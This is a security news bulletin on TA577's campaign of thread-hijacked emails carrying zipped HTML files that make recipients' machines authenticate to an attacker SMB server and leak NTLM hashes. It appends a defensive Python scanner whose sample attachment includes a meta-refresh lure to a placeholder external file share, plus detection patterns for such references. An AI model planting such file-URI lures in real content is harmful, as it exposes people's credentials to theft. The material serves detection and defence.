TA577 Exploits NTLM Authentication Vulnerability

Summary:
Proofpoint cybersecurity researchers have uncovered a new tactic employed by the cybercriminal threat actor TA577, revealing a previously unseen objective in their operations. The group was found using an attack chain aimed at stealing NT LAN Manager (NTLM) authentication information, which could potentially be used for sensitive data gathering and further malicious activities.

In their recently published analysis, the Proofpoint team identified two campaigns conducted by TA577 in February using this technique. These campaigns targeted hundreds of organizations globally, sending out tens of thousands of messages. The messages were designed to appear as replies to previous emails, employing a tactic known as thread hijacking, and contained zipped HTML attachments. Each attachment had a unique file hash, and the HTML files within were customized to specific recipients. Upon opening, these files attempted to connect to an external SMB server controlled by the threat actor, aiming to capture NTLM hashes.

Security Officer Comments:
The stolen NTLM hashes could potentially be used for password cracking or to facilitate pass-the-hash attacks within targeted organizations. Indicators suggest the use of the open-source toolkit Impacket on the SMB servers, a practice uncommon in standard SMB environments. The delivery method used by TA577, a malicious HTML file within a zip archive, is specifically designed to bypass security measures. Even disabling guest access to SMB does not mitigate the attack, because the HTML file itself initiates an authentication attempt to the external SMB server rather than relying on anonymous access.

Suggested Corrections:
Proofpoint warned that multiple threat actors are abusing file-scheme URIs to direct recipients to external file shares such as SMB and WebDAV in order to retrieve remote content for malware delivery. Organizations are advised to block outbound SMB to prevent the exploitation observed in this campaign. Additionally, Proofpoint researchers have published indicators of compromise, which can be used for detection:

https://www.proofpoint.com/us/blog/threat-insight/ta577s-unusual-attack-chain-leads-ntlm-data-theft
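As an added illustration of the detection angle (example code written for this page, not taken from Proofpoint's or Infosecurity Magazine's write-up), the scanner below inspects an HTML attachment for file:// URIs and UNC paths and reports the hosts it would try to reach over SMB or WebDAV when rendered, flagging those outside private address space. The sample attachment, the hostnames in it, and the rule that any non-IP hostname counts as external are constructed assumptions.

```python
import ipaddress
import re
from html.parser import HTMLParser

# Constructed sample attachment: a meta refresh to an external share, a benign
# HTTPS image, and two references to an internal host. Names are placeholders.
SAMPLE_HTML = r"""<html><head>
<meta http-equiv="refresh" content="0;url=file://external-share.example/share/x.txt">
</head><body>
<img src="https://intranet.example.com/logo.png">
<a href="file://10.0.0.5/docs/a.pdf">document</a>
<link rel="stylesheet" href="\\10.0.0.5\css\s.css">
</body></html>"""

# file://host/... (a third slash means a local path, which is not matched)
FILE_URI_RE = re.compile(r"file://([A-Za-z0-9.\-]+)", re.IGNORECASE)
# \\host\share\... UNC path
UNC_RE = re.compile(r"\\\\([A-Za-z0-9.\-]+)\\")


def share_hosts(html: str) -> list[str]:
    """Every host named by a file:// URI or UNC path in any tag attribute, in document order."""
    hosts: list[str] = []

    class _Collector(HTMLParser):
        def handle_starttag(self, tag, attrs):
            for _, value in attrs:
                if value:
                    for rx in (FILE_URI_RE, UNC_RE):
                        hosts.extend(m.group(1) for m in rx.finditer(value))

    _Collector().feed(html)
    return hosts


def is_external(host: str) -> bool:
    """False for private, loopback and link-local IPs; hostnames are assumed external."""
    try:
        return not ipaddress.ip_address(host).is_private
    except ValueError:
        return True  # assumption: no allowlist of internal DNS names is available


def external_share_refs(html: str) -> list[str]:
    """Distinct external hosts the attachment would authenticate to when opened."""
    return sorted({h for h in share_hosts(html) if is_external(h)})


if __name__ == "__main__":
    print("external share references:", external_share_refs(SAMPLE_HTML))
```

A mail gateway rule that quarantines zipped HTML attachments for which external_share_refs returns a non-empty list complements, rather than replaces, blocking outbound SMB at the perimeter.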


Link(s):
https://www.infosecurity-magazine.com/news/ta577-exploits-ntlm-authentication/